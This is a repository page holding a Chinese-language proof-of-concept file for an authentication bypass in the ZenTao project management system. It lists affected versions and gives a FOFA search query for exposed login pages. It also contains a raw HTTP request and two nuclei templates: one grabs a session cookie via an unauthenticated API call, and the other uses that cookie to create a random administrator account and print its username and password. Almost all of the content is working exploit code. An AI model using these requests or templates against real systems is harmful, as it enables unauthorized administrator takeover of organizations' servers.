admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/禅道项目管理系统身份认证绕过漏洞.md

137 lines
5.0 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 禅道项目管理系统身份认证绕过漏洞
禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后就可以实现完全接管服务器。
## 影响版本
```
16.x <= 禅道项目管理系统< 18.12(开源版)
6.x <= 禅道项目管理系统< 8.12(企业版)
3.x <= 禅道项目管理系统< 4.12(旗舰版)
```
## poc
```
id: easycorp-zentao-pms-idor
info:
name: 禅道项目管理系统身份认证绕过漏洞
author: GuoRong_X
severity: critical
description: |
- 禅道系统某些API设计为通过特定的鉴权函数进行验证但在实际实现中这个鉴权函数在鉴权失败后并不中断请求而是仅返回一个错误标志这个返回值在后续没有被适当处理。此外该系统在处理某些API时未能有效检查用户身份允许未认证的用户执行某些操作从而绕过鉴权机制。
reference:
- https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw
metadata:
verified: true
fofa-query: title="用户登录- 禅道"
tags: zentao
http:
- method: GET
path:
- "{{BaseURL}}/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu"
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: zentaosid='
- type: status
status:
- 200
# digest: 4a0a0047304502200b7a7cb58af457a9e566160cfdc539a99325db1513d5e4172a9a0a66f2f44e63022100fe0cc4ffd848c733eba3240bf102695253caa1420845a2b8aec5ca731e394759:58d4ffcb61df0489d6ab2fd018c17de6
```
## 添加用户poc
```
POST /biz/api.php/v1/users HTTP/1.1
Host: 192.168.0.102
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Cookie: zentaosid=d95c19a900256b7dc3c3f1866b1d121c
{"account": "asda33", "password": "QQqq123456", "realname": "asda33", "role": "top", "group": "1"}
```
![image](https://github.com/wy876/POC/assets/139549762/1c15070d-1563-4573-aff9-5da0da8c5848)
## nuclei
```
id: easycorp-zentao-pms-idor-exp
info:
name: 禅道项目管理系统身份认证绕过漏洞
author: GuoRong_X
severity: critical
description: |
- 禅道系统某些API设计为通过特定的鉴权函数进行验证但在实际实现中这个鉴权函数在鉴权失败后并不中断请求而是仅返回一个错误标志这个返回值在后续没有被适当处理。此外该系统在处理某些API时未能有效检查用户身份允许未认证的用户执行某些操作从而绕过鉴权机制。
reference:
- https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw
metadata:
verified: true
fofa-query: title="用户登录- 禅道"
tags: zentao
variables:
username: '{{rand_base(6)}}'
password: '{{rand_base(12)}}'
http:
- raw:
- |
GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: {{Hostname}}
- |
GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: {{Hostname}}
- |
GET /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: {{Hostname}}
- |
GET /max/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: {{Hostname}}
- |
POST /api.php/v1/users HTTP/1.1
Host: {{Hostname}}
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
- |
POST /zentao/api.php/v1/users HTTP/1.1
Host: {{Hostname}}
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
- |
POST /biz/api.php/v1/users HTTP/1.1
Host: {{Hostname}}
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
- |
POST /max/api.php/v1/users HTTP/1.1
Host: {{Hostname}}
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_5, "{{username}}") || contains(body_6, "{{username}}") || contains(body_7, "{{username}}") || contains(body_8, "{{username}}")'
condition: and
extractors:
- type: dsl
dsl:
- '"USER: "+ username'
- '"PASS: "+ password'
```
Reference in New Issue View Git Blame Copy Permalink